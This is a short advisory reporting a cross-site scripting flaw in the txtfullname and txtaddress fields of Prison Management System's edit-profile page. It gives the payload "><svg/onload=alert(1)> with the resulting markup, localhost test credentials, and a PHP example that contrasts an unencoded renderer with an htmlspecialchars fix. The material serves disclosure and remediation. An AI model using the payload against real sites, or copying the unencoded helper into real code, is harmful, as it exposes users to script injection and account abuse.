Prison Management System

XSS on /Employee/edit-profile.php

Vendor Homepage:

https://www.sourcecodester.com/sql/17287/prison-management-system.html

Version:

V1.0

Tested on:

PHP, Apache, MySQL

Credentials:

http://localhost/prison/Account/login.php
password:- escobar2012
Email :- releaseme@gmail.com

Affected Page:

/Employee/edit-profile.php

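The parameters txtfullname and txtaddress are echoed directly into the HTML without proper sanitization or validation. Each value lands inside a double-quoted value attribute, so a double quote in the input closes the attribute early. This allows an attacker to inject arbitrary JavaScript code into the page, leading to XSS attacks.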

# Employee/edit-profile.php
<input type="text" size="77" name="txtaddress" value=""><svg/onload=alert(1)>" class="form-control">
<input type="text" size="77" name="txtfullname" value=""><svg/onload=alert(1)>" class="form-control" required="">

Proof of Concept:

Payload:

"><svg/onload=alert(1)>
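
One way to fix the output shown above, as an added example that is not code from the project: the helper names (attr, render_input_unsafe, render_input_safe) are hypothetical, and the real edit-profile.php is assumed to build these fields by concatenating the stored value into the value attribute.

```php
<?php
// Added example: hypothetical helpers, not code from Prison Management System.

// Mirrors the behaviour described in this advisory: the value is concatenated
// into the attribute unencoded, so a double quote ends value="..." early.
function render_input_unsafe(string $name, string $value): string
{
    return '<input type="text" size="77" name="' . $name
         . '" value="' . $value . '" class="form-control">';
}

// Encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened form: every dynamic value passes through attr() before output.
function render_input_safe(string $name, string $value): string
{
    return '<input type="text" size="77" name="' . attr($name)
         . '" value="' . attr($value) . '" class="form-control">';
}

// The payload from this advisory, standing in for a stored profile value.
$stored = '"><svg/onload=alert(1)>';

// Unencoded: reproduces the broken markup shown under "Affected Page".
echo render_input_unsafe('txtaddress', $stored), PHP_EOL;

// Encoded: the payload stays inside the attribute as inert text
// (value="&quot;&gt;&lt;svg/onload=alert(1)&gt;").
$safe = render_input_safe('txtaddress', $stored);
echo $safe, PHP_EOL;

// Regression check: no raw tag may survive encoding.
if (strpos($safe, '<svg') !== false) {
    throw new RuntimeException('payload was not encoded');
}
```

Encoding belongs at the point of output rather than at input, so the same stored value is also safe wherever else the application prints it through attr().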
